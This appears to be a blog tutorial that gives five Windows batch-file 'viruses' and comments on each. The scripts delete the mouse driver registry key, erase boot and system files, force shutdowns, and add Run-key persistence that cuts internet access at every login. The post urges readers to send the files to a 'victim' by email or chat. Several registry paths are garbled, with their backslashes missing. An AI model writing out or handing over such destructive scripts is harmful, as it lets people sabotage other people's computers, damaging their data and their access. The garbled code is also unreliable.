Make 5 types of virus using notepad

  
Hello everyone in this tutorial i am going to tell  u how ma make a virus using  notepad............

1)disable mouse virus.......


This is harmful it will disable your mouse so think before trying it on yourself.
Open Notepad and copy below codes:-
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4 
rem ---------------------------------

Save this file as virus.bat

Done you just created your virus.
Send it to victim via mail or F.B chat. . . 

2)harmless virus..........

open notepad and write ''start'' without quotes 
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
                

                                                        and then save it with .bat extension. in all files 
                                              Now double click on this .bat file to run Command Prompt... 

3)Shutdown Enemy Computer forever....???

Open notepad and copy/paste this code:
 @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini

Now Save it as a .bat file. This should shutdown the persons computer. It shuts it off once and deletes the file needed to reboot and restart.........

4)funny virus.....!!!!!!!!!!!!!!!

Create Funny Virus With Your Notepad. . .
Convey your friend a  message and shut down his / her computer:
Type :
@echo off
msg * I don't like you shutdown -c "Error! You are too silly!" -s
Save it as "Anything.BAT" in All Files and send it from chat/mail/link etc. .

5)Disable the internet forever..////////////....

write this codes in notepad and save it in bat file 

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime 😀
PAUSE

Enjoy!!!!!!!!


Previous
Next Post »

1 comments:

Write comments
Unknown
AUTHOR
November 7, 2016 at 4:14 AM delete


Very informative article.Thank you author for posting this kind of article .


http://www.wikitechy.com/view-article/c-program-to-find-frequency-of-characters-in-a-string-with-example-and-explanation



Both are really good,
Cheers,
Venkat

Reply
avatar